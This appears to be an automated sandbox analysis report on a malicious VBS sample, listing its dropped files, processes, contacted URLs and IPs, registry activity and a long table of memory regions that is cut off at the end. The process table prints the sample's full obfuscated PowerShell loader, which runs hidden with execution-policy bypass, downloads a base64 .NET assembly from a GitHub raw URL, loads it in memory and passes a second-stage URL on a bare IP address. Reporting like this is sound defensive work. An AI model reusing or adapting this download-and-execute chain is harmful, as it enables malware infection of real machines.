Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
iJEK0xwucj.vbs
|
Unicode text, UTF-16, little-endian text, with CRLF line terminators
|
initial sample
|
 |
|
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_iehfy2qi.hzg.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pujirynq.g3y.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qwyapev2.0ri.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yke45px1.ffr.psm1
|
ASCII text, with no line terminators
|
dropped
|
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Windows\System32\wscript.exe
|
C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\iJEK0xwucj.vbs"
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnYTYnKyc4JysndXJsJysnID0gJysnbWlNJysnaHR0cHMnKyc6Ly9yYScrJ3cuZ2l0aHViJysndXNlcicrJ2MnKydvbnQnKydlJysnbicrJ3QuY29tJysnL05vRGUnKyd0ZWMnKyd0T24vTm9EJysnZScrJ3RlJysnYycrJ3RPbi9yZWYnKydzLycrJ2hlJysnYWRzLycrJ21haW4vRGUnKyd0JysnYWgnKydObycrJ3RoLVYudCcrJ3h0JysnbWlNOyBhNjhiJysnYXNlNjRDb24nKyd0ZW4nKyd0ID0nKycgKE5ldycrJy0nKydPYicrJ2plJysnYycrJ3QgU3knKydzJysndGVtJysnLk5ldC5XZWJDbGknKydlbnQpJysnLicrJ0QnKydvdycrJ25sb2FkJysnU3RyaScrJ25nKGEnKyc2OHVybCknKyc7ICcrJ2E2OGJpbmFyeUMnKydvJysnbnRlJysnbnQnKycgPSBbU3lzdGVtLkNvbnZlcnRdJysnOjpGJysncm8nKydtQicrJ2EnKydzJysnZTY0U3QnKydyaW5nKGE2OGInKydhc2U2NCcrJ0NvbicrJ3QnKydlbicrJ3QpOyBhJysnNjgnKydhJysnc3NlbWJseSAnKyc9IFtSZScrJ2YnKydsZWN0aW8nKyduLkFzc2VtYmx5XScrJzo6TG9hZChhJysnNjgnKydiaW5hcicrJ3lDbycrJ250JysnZW50KTsgW2RubCcrJ2liLklPLkgnKydvJysnbWVdJysnOjpWQUkodWJ6dHh0LicrJ1InKydWJysnVlJTLzEnKycwOCcrJy8xMzEnKycuJysnNDgxJysnLjInKyczMi4yJysnNzEvLzpwdHRodScrJ2J6LCcrJyB1YicrJ3pkZXNhJysndGl2YWRvdWInKyd6LCB1YnonKydkZScrJ3NhdGknKyd2YScrJ2RvdScrJ2J6JysnLCB1YnpkZXMnKydhJysndGl2JysnYWRvdWInKyd6LCB1YnpSJysnZWdBc20nKyd1YnonKycsIHViJysneicrJ3ViJysneix1JysnYnp1JysnYicrJ3onKycpJyktY3JlUExhY0UnbWlNJyxbQ0hBcl0zOSAgLWNyZVBMYWNFIChbQ0hBcl05NytbQ0hBcl01NCtbQ0hBcl01NiksW0NIQXJdMzYgLWNyZVBMYWNFICd1YnonLFtDSEFyXTM0KSB8IC4gKCAkUFNIT21lWzIxXSskcHNIT21FWzM0XSsnWCcp';$OWjuxd
= [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy
bypass -NoProfile -command $OWjuxD
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command
"(('a6'+'8'+'url'+' = '+'miM'+'https'+'://ra'+'w.github'+'user'+'c'+'ont'+'e'+'n'+'t.com'+'/NoDe'+'tec'+'tOn/NoD'+'e'+'te'+'c'+'tOn/ref'+'s/'+'he'+'ads/'+'main/De'+'t'+'ah'+'No'+'th-V.t'+'xt'+'miM;
a68b'+'ase64Con'+'ten'+'t ='+' (New'+'-'+'Ob'+'je'+'c'+'t Sy'+'s'+'tem'+'.Net.WebCli'+'ent)'+'.'+'D'+'ow'+'nload'+'Stri'+'ng(a'+'68url)'+';
'+'a68binaryC'+'o'+'nte'+'nt'+' = [System.Convert]'+'::F'+'ro'+'mB'+'a'+'s'+'e64St'+'ring(a68b'+'ase64'+'Con'+'t'+'en'+'t);
a'+'68'+'a'+'ssembly '+'= [Re'+'f'+'lectio'+'n.Assembly]'+'::Load(a'+'68'+'binar'+'yCo'+'nt'+'ent); [dnl'+'ib.IO.H'+'o'+'me]'+'::VAI(ubztxt.'+'R'+'V'+'VRS/1'+'08'+'/131'+'.'+'481'+'.2'+'32.2'+'71//:ptthu'+'bz,'+'
ub'+'zdesa'+'tivadoub'+'z, ubz'+'de'+'sati'+'va'+'dou'+'bz'+', ubzdes'+'a'+'tiv'+'adoub'+'z, ubzR'+'egAsm'+'ubz'+', ub'+'z'+'ub'+'z,u'+'bzu'+'b'+'z'+')')-crePLacE'miM',[CHAr]39
-crePLacE ([CHAr]97+[CHAr]54+[CHAr]56),[CHAr]36 -crePLacE 'ubz',[CHAr]34) | . ( $PSHOme[21]+$psHOmE[34]+'X')"
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
https://raw.githubusercontent.com/NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txt
|
185.199.108.133
|
||
|
http://nuget.org/NuGet.exe
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0
|
unknown
|
||
|
https://raw.githubusercontent.com/NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txtmiM;
|
unknown
|
||
|
http://pesterbdd.com/images/Pester.png
|
unknown
|
||
|
https://raw.githubusercontent.com
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
|
https://go.micro
|
unknown
|
||
|
https://contoso.com/
|
unknown
|
||
|
https://nuget.org/nuget.exe
|
unknown
|
||
|
https://contoso.com/License
|
unknown
|
||
|
http://raw.githubusercontent.com
|
unknown
|
||
|
https://contoso.com/Icon
|
unknown
|
||
|
https://oneget.orgX
|
unknown
|
||
|
https://raw.githubusercont
|
unknown
|
||
|
http://172.232.184.131/801/SRVVR.txt
|
172.232.184.131
|
||
|
https://aka.ms/pscore6
|
unknown
|
||
|
https://aka.ms/pscore68
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
|
http://172.232.184.131(
|
unknown
|
||
|
https://github.com/Pester/Pester
|
unknown
|
||
|
https://oneget.org
|
unknown
|
||
|
http://172.232.184.131
|
unknown
|
There are 13 hidden URLs, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
raw.githubusercontent.com
|
185.199.108.133
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
172.232.184.131
|
unknown
|
United States
|
||
|
185.199.108.133
|
raw.githubusercontent.com
|
Netherlands
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
There are 4 hidden registries, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
178225E5000
|
trusted library allocation
|
page read and write
|
||
|
2384C851000
|
heap
|
page read and write
|
||
|
7FFAAC6A0000
|
trusted library allocation
|
page read and write
|
||
|
2384C88E000
|
heap
|
page read and write
|
||
|
2384C8E7000
|
heap
|
page read and write
|
||
|
7FFAAC610000
|
trusted library allocation
|
page execute and read and write
|
||
|
1783150F000
|
trusted library allocation
|
page read and write
|
||
|
178394CD000
|
heap
|
page read and write
|
||
|
2384C923000
|
heap
|
page read and write
|
||
|
7FFAAC4F0000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC443000
|
trusted library allocation
|
page execute and read and write
|
||
|
2384C87A000
|
heap
|
page read and write
|
||
|
2C6F4187000
|
heap
|
page read and write
|
||
|
2C6F21F0000
|
heap
|
page read and write
|
||
|
2384C901000
|
heap
|
page read and write
|
||
|
178212E1000
|
trusted library allocation
|
page read and write
|
||
|
2C680120000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC5F2000
|
trusted library allocation
|
page read and write
|
||
|
1781EF60000
|
heap
|
page read and write
|
||
|
2C6F40ED000
|
heap
|
page read and write
|
||
|
2384C89A000
|
heap
|
page read and write
|
||
|
7FFAAC452000
|
trusted library allocation
|
page read and write
|
||
|
2384ABA0000
|
heap
|
page read and write
|
||
|
7FFAAC44D000
|
trusted library allocation
|
page execute and read and write
|
||
|
2384AA4E000
|
heap
|
page read and write
|
||
|
1781F1A0000
|
trusted library allocation
|
page read and write
|
||
|
1781EFA5000
|
heap
|
page read and write
|
||
|
2C6F21A5000
|
heap
|
page read and write
|
||
|
17839016000
|
heap
|
page read and write
|
||
|
2384C8DB000
|
heap
|
page read and write
|
||
|
4EABBCD000
|
stack
|
page read and write
|
||
|
2384C923000
|
heap
|
page read and write
|
||
|
7FFAAC6D0000
|
trusted library allocation
|
page read and write
|
||
|
178212F3000
|
trusted library allocation
|
page read and write
|
||
|
2384C923000
|
heap
|
page read and write
|
||
|
2C6F21AD000
|
heap
|
page read and write
|
||
|
4EAAEFB000
|
stack
|
page read and write
|
||
|
2384A9DF000
|
heap
|
page read and write
|
||
|
E75AB3F000
|
stack
|
page read and write
|
||
|
1783947D000
|
heap
|
page read and write
|
||
|
2C680534000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC7F0000
|
trusted library allocation
|
page read and write
|
||
|
2384C862000
|
heap
|
page read and write
|
||
|
7FFAAC6C0000
|
trusted library allocation
|
page read and write
|
||
|
2384C923000
|
heap
|
page read and write
|
||
|
4EAAE78000
|
stack
|
page read and write
|
||
|
2384C8FB000
|
heap
|
page read and write
|
||
|
2C6F22D6000
|
heap
|
page read and write
|
||
|
2384AA65000
|
heap
|
page read and write
|
||
|
2C6804CA000
|
trusted library allocation
|
page read and write
|
||
|
2C690075000
|
trusted library allocation
|
page read and write
|
||
|
2C680109000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC7B3000
|
trusted library allocation
|
page read and write
|
||
|
E75A77E000
|
stack
|
page read and write
|
||
|
7FFB16790000
|
unkown
|
page readonly
|
||
|
1781EFE7000
|
heap
|
page read and write
|
||
|
2C690001000
|
trusted library allocation
|
page read and write
|
||
|
2384C855000
|
heap
|
page read and write
|
||
|
2C690010000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC442000
|
trusted library allocation
|
page read and write
|
||
|
2C6F4220000
|
heap
|
page read and write
|
||
|
2C680021000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC610000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFB16791000
|
unkown
|
page execute read
|
||
|
17830F00000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC60A000
|
trusted library allocation
|
page read and write
|
||
|
2C6F2070000
|
heap
|
page read and write
|
||
|
7DF49B550000
|
trusted library allocation
|
page execute and read and write
|
||
|
2384C86E000
|
heap
|
page read and write
|
||
|
62231FB000
|
stack
|
page read and write
|
||
|
2384C85C000
|
heap
|
page read and write
|
||
|
2384A9B0000
|
heap
|
page read and write
|
||
|
2C6F2232000
|
heap
|
page read and write
|
||
|
2384C908000
|
heap
|
page read and write
|
||
|
2384C8EF000
|
heap
|
page read and write
|
||
|
7FFAAC710000
|
trusted library allocation
|
page read and write
|
||
|
2384C8EC000
|
heap
|
page read and write
|
||
|
7FFAAC690000
|
trusted library allocation
|
page read and write
|
||
|
1781EFEC000
|
heap
|
page read and write
|
||
|
2384C8CF000
|
heap
|
page read and write
|
||
|
17821568000
|
trusted library allocation
|
page read and write
|
||
|
1781F052000
|
heap
|
page read and write
|
||
|
1782285E000
|
trusted library allocation
|
page read and write
|
||
|
2384C895000
|
heap
|
page read and write
|
||
|
2384C8E0000
|
heap
|
page read and write
|
||
|
2384CADC000
|
heap
|
page read and write
|
||
|
2384C867000
|
heap
|
page read and write
|
||
|
2384C900000
|
heap
|
page read and write
|
||
|
7FFAAC510000
|
trusted library allocation
|
page execute and read and write
|
||
|
2384C925000
|
heap
|
page read and write
|
||
|
2384AA58000
|
heap
|
page read and write
|
||
|
2C680604000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC4F6000
|
trusted library allocation
|
page read and write
|
||
|
2C6F3AD0000
|
heap
|
page readonly
|
||
|
7FFAAC700000
|
trusted library allocation
|
page read and write
|
||
|
178225CD000
|
trusted library allocation
|
page read and write
|
||
|
1781F1B0000
|
heap
|
page readonly
|
||
|
2C6F3BD0000
|
heap
|
page read and write
|
||
|
7FFAAC444000
|
trusted library allocation
|
page read and write
|
||
|
4EAAC7E000
|
stack
|
page read and write
|
||
|
178394BC000
|
heap
|
page read and write
|
||
|
2C68015D000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC650000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC630000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFAAC5E0000
|
trusted library allocation
|
page read and write
|
||
|
4EAB07F000
|
stack
|
page read and write
|
||
|
2C6F40A0000
|
heap
|
page read and write
|
||
|
7FFAAC4FC000
|
trusted library allocation
|
page execute and read and write
|
||
|
2384C858000
|
heap
|
page read and write
|
||
|
7FFAAC5F1000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC710000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC720000
|
trusted library allocation
|
page read and write
|
||
|
7FFB167B5000
|
unkown
|
page readonly
|
||
|
17839000000
|
heap
|
page read and write
|
||
|
2384A9B7000
|
heap
|
page read and write
|
||
|
2384C8D8000
|
heap
|
page read and write
|
||
|
2384AA80000
|
heap
|
page read and write
|
||
|
178220F4000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC560000
|
trusted library allocation
|
page execute and read and write
|
||
|
2C6F2170000
|
heap
|
page read and write
|
||
|
2384CA03000
|
heap
|
page read and write
|
||
|
2384A9D9000
|
heap
|
page read and write
|
||
|
17838EFB000
|
heap
|
page read and write
|
||
|
2C6F22E6000
|
heap
|
page read and write
|
||
|
2384C8A7000
|
heap
|
page read and write
|
||
|
1781EF9F000
|
heap
|
page read and write
|
||
|
2384C869000
|
heap
|
page read and write
|
||
|
178225F7000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC460000
|
trusted library allocation
|
page read and write
|
||
|
7FFB167B0000
|
unkown
|
page read and write
|
||
|
2384C87D000
|
heap
|
page read and write
|
||
|
2384C8B3000
|
heap
|
page read and write
|
||
|
7FFAAC730000
|
trusted library allocation
|
page read and write
|
||
|
2384C996000
|
heap
|
page read and write
|
||
|
2384C924000
|
heap
|
page read and write
|
||
|
7FFAAC650000
|
trusted library allocation
|
page read and write
|
||
|
E75A97F000
|
stack
|
page read and write
|
||
|
4EAABFE000
|
stack
|
page read and write
|
||
|
E75A7FF000
|
stack
|
page read and write
|
||
|
2C6F2203000
|
heap
|
page read and write
|
||
|
62229FE000
|
stack
|
page read and write
|
||
|
178394B4000
|
heap
|
page read and write
|
||
|
7FFAAC570000
|
trusted library allocation
|
page execute and read and write
|
||
|
E75AAFE000
|
stack
|
page read and write
|
||
|
E75AF3B000
|
stack
|
page read and write
|
||
|
7FFAAC5FA000
|
trusted library allocation
|
page read and write
|
||
|
2C6F4158000
|
heap
|
page read and write
|
||
|
2C6F21C0000
|
heap
|
page read and write
|
||
|
2C6F3AA0000
|
trusted library allocation
|
page read and write
|
||
|
17822BE2000
|
trusted library allocation
|
page read and write
|
||
|
7FFB167B2000
|
unkown
|
page readonly
|
||
|
E75A673000
|
stack
|
page read and write
|
||
|
2384C87D000
|
heap
|
page read and write
|
||
|
2384AA34000
|
heap
|
page read and write
|
||
|
7FFAAC622000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC7DB000
|
trusted library allocation
|
page read and write
|
||
|
2C680606000
|
trusted library allocation
|
page read and write
|
||
|
2C6F3BD6000
|
heap
|
page read and write
|
||
|
2384A9DA000
|
heap
|
page read and write
|
||
|
17839193000
|
heap
|
page read and write
|
||
|
622251A000
|
stack
|
page read and write
|
||
|
178225D3000
|
trusted library allocation
|
page read and write
|
||
|
2C68010F000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC6F0000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC600000
|
trusted library allocation
|
page execute and read and write
|
||
|
17839160000
|
heap
|
page execute and read and write
|
||
|
1782254D000
|
trusted library allocation
|
page read and write
|
||
|
2384C950000
|
heap
|
page read and write
|
||
|
2384AA5D000
|
heap
|
page read and write
|
||
|
7FFAAC526000
|
trusted library allocation
|
page execute and read and write
|
||
|
2384A9E6000
|
heap
|
page read and write
|
||
|
17822BDE000
|
trusted library allocation
|
page read and write
|
||
|
7FFB167A6000
|
unkown
|
page readonly
|
||
|
17821571000
|
trusted library allocation
|
page read and write
|
||
|
6222CFE000
|
stack
|
page read and write
|
||
|
7FFAAC6F0000
|
trusted library allocation
|
page read and write
|
||
|
2384C85F000
|
heap
|
page read and write
|
||
|
17831F0F000
|
trusted library allocation
|
page read and write
|
||
|
2C6F415B000
|
heap
|
page read and write
|
||
|
2384C8D4000
|
heap
|
page read and write
|
||
|
2C680068000
|
trusted library allocation
|
page read and write
|
||
|
4EAAD79000
|
stack
|
page read and write
|
||
|
2C680050000
|
trusted library allocation
|
page read and write
|
||
|
17839447000
|
heap
|
page read and write
|
||
|
1781EF73000
|
heap
|
page read and write
|
||
|
2384C876000
|
heap
|
page read and write
|
||
|
7FFAAC632000
|
trusted library allocation
|
page read and write
|
||
|
17821F71000
|
trusted library allocation
|
page read and write
|
||
|
2384C8C7000
|
heap
|
page read and write
|
||
|
2C6F4240000
|
heap
|
page read and write
|
||
|
178212D7000
|
trusted library allocation
|
page read and write
|
||
|
2C6F3B00000
|
heap
|
page read and write
|
||
|
2384C923000
|
heap
|
page read and write
|
||
|
2384A9E0000
|
heap
|
page read and write
|
||
|
17820AA6000
|
heap
|
page read and write
|
||
|
7FFAAC620000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFAAC660000
|
trusted library allocation
|
page read and write
|
||
|
2384C871000
|
heap
|
page read and write
|
||
|
7FFAAC740000
|
trusted library allocation
|
page read and write
|
||
|
2384C923000
|
heap
|
page read and write
|
||
|
7FFAAC730000
|
trusted library allocation
|
page read and write
|
||
|
2384AA80000
|
heap
|
page read and write
|
||
|
2384AA5A000
|
heap
|
page read and write
|
||
|
1782140B000
|
trusted library allocation
|
page read and write
|
||
|
2384C858000
|
heap
|
page read and write
|
||
|
2384AA80000
|
heap
|
page read and write
|
||
|
2384A9E7000
|
heap
|
page read and write
|
||
|
7FFAAC6B0000
|
trusted library allocation
|
page read and write
|
||
|
7FFB167B0000
|
unkown
|
page read and write
|
||
|
7FFB167A6000
|
unkown
|
page readonly
|
||
|
7FFAAC720000
|
trusted library allocation
|
page read and write
|
||
|
2384CA51000
|
heap
|
page read and write
|
||
|
4EAA683000
|
stack
|
page read and write
|
||
|
2384AC70000
|
heap
|
page read and write
|
||
|
1781F140000
|
heap
|
page read and write
|
||
|
7FFAAC780000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC6C0000
|
trusted library allocation
|
page read and write
|
||
|
2C6F4580000
|
heap
|
page read and write
|
||
|
2384C853000
|
heap
|
page read and write
|
||
|
2C680001000
|
trusted library allocation
|
page read and write
|
||
|
2384C951000
|
heap
|
page read and write
|
||
|
E75A87E000
|
stack
|
page read and write
|
||
|
1781EFE9000
|
heap
|
page read and write
|
||
|
17839439000
|
heap
|
page read and write
|
||
|
7FFAAC670000
|
trusted library allocation
|
page read and write
|
||
|
1781EFAB000
|
heap
|
page read and write
|
||
|
2384C85A000
|
heap
|
page read and write
|
||
|
2C68010C000
|
trusted library allocation
|
page read and write
|
||
|
2384C8CC000
|
heap
|
page read and write
|
||
|
1781F204000
|
heap
|
page read and write
|
||
|
2384C8F4000
|
heap
|
page read and write
|
||
|
17820EF1000
|
trusted library allocation
|
page read and write
|
||
|
2384C85D000
|
heap
|
page read and write
|
||
|
2C680123000
|
trusted library allocation
|
page read and write
|
||
|
2384C923000
|
heap
|
page read and write
|
||
|
2384AA44000
|
heap
|
page read and write
|
||
|
7FFB16791000
|
unkown
|
page execute read
|
||
|
2384AA80000
|
heap
|
page read and write
|
||
|
2384C8CA000
|
heap
|
page read and write
|
||
|
178225F3000
|
trusted library allocation
|
page read and write
|
||
|
2C6F40F7000
|
heap
|
page read and write
|
||
|
7FFAAC640000
|
trusted library allocation
|
page read and write
|
||
|
2C6F41A7000
|
heap
|
page execute and read and write
|
||
|
7FFAAC660000
|
trusted library allocation
|
page read and write
|
||
|
1783941B000
|
heap
|
page read and write
|
||
|
E75AEBE000
|
stack
|
page read and write
|
||
|
7FFAAC45D000
|
trusted library allocation
|
page execute and read and write
|
||
|
17820EE0000
|
heap
|
page read and write
|
||
|
178212EF000
|
trusted library allocation
|
page read and write
|
||
|
2C6F41A0000
|
heap
|
page execute and read and write
|
||
|
7FFAAC7A0000
|
trusted library allocation
|
page read and write
|
||
|
1782283D000
|
trusted library allocation
|
page read and write
|
||
|
2C68011D000
|
trusted library allocation
|
page read and write
|
||
|
2384C923000
|
heap
|
page read and write
|
||
|
2384C923000
|
heap
|
page read and write
|
||
|
7FFAAC6A0000
|
trusted library allocation
|
page read and write
|
||
|
17822898000
|
trusted library allocation
|
page read and write
|
||
|
2384AA34000
|
heap
|
page read and write
|
||
|
2384C882000
|
heap
|
page read and write
|
||
|
2384A940000
|
heap
|
page read and write
|
||
|
7FFAAC450000
|
trusted library allocation
|
page read and write
|
||
|
17839167000
|
heap
|
page execute and read and write
|
||
|
2384CA50000
|
heap
|
page read and write
|
||
|
17830F66000
|
trusted library allocation
|
page read and write
|
||
|
2384C8CF000
|
heap
|
page read and write
|
||
|
2C680070000
|
trusted library allocation
|
page read and write
|
||
|
178394B1000
|
heap
|
page read and write
|
||
|
7FFAAC750000
|
trusted library allocation
|
page read and write
|
||
|
2C680126000
|
trusted library allocation
|
page read and write
|
||
|
1781F180000
|
trusted library allocation
|
page read and write
|
||
|
4EABB4E000
|
stack
|
page read and write
|
||
|
2384C925000
|
heap
|
page read and write
|
||
|
4EAB17C000
|
stack
|
page read and write
|
||
|
7FFB167B0000
|
unkown
|
page read and write
|
||
|
2C6F415D000
|
heap
|
page read and write
|
||
|
7FFB167B5000
|
unkown
|
page readonly
|
||
|
2384C897000
|
heap
|
page read and write
|
||
|
2C6F227E000
|
heap
|
page read and write
|
||
|
7FFAAC45B000
|
trusted library allocation
|
page read and write
|
||
|
2384CA03000
|
heap
|
page read and write
|
||
|
17820F70000
|
trusted library allocation
|
page read and write
|
||
|
17820AA4000
|
heap
|
page read and write
|
||
|
4EAAAFE000
|
stack
|
page read and write
|
||
|
1781F200000
|
heap
|
page read and write
|
||
|
2384AA63000
|
heap
|
page read and write
|
||
|
6222BFF000
|
stack
|
page read and write
|
||
|
7FFAAC700000
|
trusted library allocation
|
page read and write
|
||
|
2C6F410C000
|
heap
|
page read and write
|
||
|
2384C854000
|
heap
|
page read and write
|
||
|
E75ADBE000
|
stack
|
page read and write
|
||
|
1781EFBF000
|
heap
|
page read and write
|
||
|
7FFAAC506000
|
trusted library allocation
|
page read and write
|
||
|
2384C8DB000
|
heap
|
page read and write
|
||
|
7FFAAC690000
|
trusted library allocation
|
page read and write
|
||
|
2C6F410E000
|
heap
|
page read and write
|
||
|
2C6F40A5000
|
heap
|
page read and write
|
||
|
2384C925000
|
heap
|
page read and write
|
||
|
17820A70000
|
heap
|
page execute and read and write
|
||
|
2C6F22EC000
|
heap
|
page read and write
|
||
|
2C6F3AC0000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC680000
|
trusted library allocation
|
page read and write
|
||
|
2384C8BF000
|
heap
|
page read and write
|
||
|
178393F0000
|
heap
|
page read and write
|
||
|
7FFAAC6E0000
|
trusted library allocation
|
page read and write
|
||
|
6222FFE000
|
stack
|
page read and write
|
||
|
2C6F4320000
|
heap
|
page execute and read and write
|
||
|
7FFAAC6B0000
|
trusted library allocation
|
page read and write
|
||
|
4EAAA7E000
|
stack
|
page read and write
|
||
|
1781EF10000
|
heap
|
page read and write
|
||
|
2384AC75000
|
heap
|
page read and write
|
||
|
7FFAAC790000
|
trusted library allocation
|
page read and write
|
||
|
4EAA7CE000
|
stack
|
page read and write
|
||
|
2384C854000
|
heap
|
page read and write
|
||
|
2C68001B000
|
trusted library allocation
|
page read and write
|
||
|
17822811000
|
trusted library allocation
|
page read and write
|
||
|
2384C889000
|
heap
|
page read and write
|
||
|
7FFAAC770000
|
trusted library allocation
|
page read and write
|
||
|
2C6F2230000
|
heap
|
page read and write
|
||
|
2384CADB000
|
heap
|
page read and write
|
||
|
17830EF1000
|
trusted library allocation
|
page read and write
|
||
|
7FFB167B2000
|
unkown
|
page readonly
|
||
|
2C6F223C000
|
heap
|
page read and write
|
||
|
6222EFD000
|
stack
|
page read and write
|
||
|
7FFAAC500000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFAAC601000
|
trusted library allocation
|
page read and write
|
||
|
2C680112000
|
trusted library allocation
|
page read and write
|
||
|
178311EF000
|
trusted library allocation
|
page read and write
|
||
|
178395F0000
|
trusted library section
|
page read and write
|
||
|
4EAACFE000
|
stack
|
page read and write
|
||
|
1782131B000
|
trusted library allocation
|
page read and write
|
||
|
2384C8AA000
|
heap
|
page read and write
|
||
|
2384C859000
|
heap
|
page read and write
|
||
|
2C6F2250000
|
heap
|
page read and write
|
||
|
1781EF00000
|
heap
|
page read and write
|
||
|
4EAA78F000
|
stack
|
page read and write
|
||
|
2C6F2236000
|
heap
|
page read and write
|
||
|
2384C923000
|
heap
|
page read and write
|
||
|
4EAAFFE000
|
stack
|
page read and write
|
||
|
7FFAAC5F0000
|
trusted library allocation
|
page read and write
|
||
|
4EAAB7D000
|
stack
|
page read and write
|
||
|
7FFAAC680000
|
trusted library allocation
|
page read and write
|
||
|
E75A9FE000
|
stack
|
page read and write
|
||
|
7FFAAC770000
|
trusted library allocation
|
page read and write
|
||
|
62228FE000
|
stack
|
page read and write
|
||
|
7FFAAC740000
|
trusted library allocation
|
page read and write
|
||
|
2C6F22E8000
|
heap
|
page read and write
|
||
|
2384CA04000
|
heap
|
page read and write
|
||
|
62230FF000
|
stack
|
page read and write
|
||
|
7FFAAC750000
|
trusted library allocation
|
page read and write
|
||
|
2384C850000
|
heap
|
page read and write
|
||
|
7FFAAC6D0000
|
trusted library allocation
|
page read and write
|
||
|
2C68009D000
|
trusted library allocation
|
page read and write
|
||
|
E75AA7E000
|
stack
|
page read and write
|
||
|
7FFAAC7D3000
|
trusted library allocation
|
page read and write
|
||
|
2384AA80000
|
heap
|
page read and write
|
||
|
7FFAAC640000
|
trusted library allocation
|
page execute and read and write
|
||
|
17820A50000
|
heap
|
page execute and read and write
|
||
|
7FFAAC7E0000
|
trusted library allocation
|
page read and write
|
||
|
17839048000
|
heap
|
page read and write
|
||
|
2384AA5E000
|
heap
|
page read and write
|
||
|
17821317000
|
trusted library allocation
|
page read and write
|
||
|
7FFB16790000
|
unkown
|
page readonly
|
||
|
1781EF30000
|
heap
|
page read and write
|
||
|
17820AA0000
|
heap
|
page read and write
|
||
|
178209B0000
|
trusted library allocation
|
page read and write
|
||
|
E75A6FE000
|
stack
|
page read and write
|
||
|
7FFAAC760000
|
